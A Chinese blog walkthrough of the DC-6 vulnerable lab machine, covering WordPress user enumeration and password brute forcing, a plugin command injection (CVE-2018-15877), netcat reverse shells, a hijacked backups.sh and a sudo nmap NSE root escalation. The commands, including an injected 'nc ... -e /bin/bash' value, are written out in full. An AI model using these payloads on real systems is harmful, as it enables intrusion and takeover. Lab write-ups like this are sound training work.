环境配置
开始之前让我们先来看看靶机与攻击机的配置,两者均是NAT模式
kali ip:192.168.13.128

靶机复现
nmap扫描网段,发现靶机IP192.168.13.137
扫描开放端口

06025-ldibxm3r7ei.png

无法跟踪 加入hosts头后
访问发现是wordpress

03567-gj5erxjdiul.png

直接上wpscan 扫描存在的用户名 思路跟dc2差不多

wpscan --url http://wordy -e u

61004-xqbt9xakdfa.png

发现存在5个用户名 保存
下一步根据上面下载地址处作者的提示,我们生产一个字典包
cp /usr/share/wordlists/rockyou.txt ./
直接爆破用户

wpscan --url http://wordy -U  /home/kali/Desktop/user  -P /home/kali/Desktop/rockyou.txt

[SUCCESS] - mark / helpdesk01
爆破出用户mark
密码为helpdesk01

06963-pkc028yb74f.png

但是因为是普通用户权限,无法直接写shell,我们继续看看
发现了一个插件 查看是否存在漏洞

53875-0npca2ew31fb.png

发现存在一个cve-2018-15877WordPress 远程命令执行漏洞
通过插件触发RCE
查看复现步骤
反弹shell

127.0.0.1 | nc 192.168.13.128 4444 -e /bin/bash

63795-rpv3jzh0w4.png

35410-ynglaae2lzr.png

python -c 'import pty;pty.spawn("/bin/bash")'

进入交互模式
查找敏感文件

13700-84rnqycsjnc.png

拿到账号密码
graham : GSo7isUM1D4
我们使用拿到的账号密码登陆ssh
ssh graham@192.168.13.137

90143-en01abj7lyb.png

下面提权

96706-irugjjlwxzs.png

可以看到 “backups.sh” 不需要密码,即可修改

42841-ergghqsaycu.png

10221-eupc1yqh914.png

在backups.sh中插入

echo 'nc 192.168.13.128 4444 -e /bin/bash' > backups.sh

然后监听kali的4444端口,并使用sudo执行backups.sh,使其弹回jens权限的shell:

71474-ch3ghit265r.png

python弹交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'

64030-lka1ika5er.png

查看jens权限:

sudo -l

12994-o6yi9ymtdk.png

nmap可以使用root权限免密执行,可用来获取root权限
利用nmap能够执行脚本的功能,将/bin/sh写入到脚本中,令其执行,获取root权限:

echo 'os.execute("/bin/sh")' > /tmp/kevin.nse
sudo nmap --script=/tmp/kevin.nse

02220-d4dsml08cyn.png

思路就是 因为管理员权限的nmap是不需要密码就能以root权限运行
那我们就可以写一个shell到nmap插件中进行加载 他就会以root权限执行这个shell


本文由 wulaoban 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论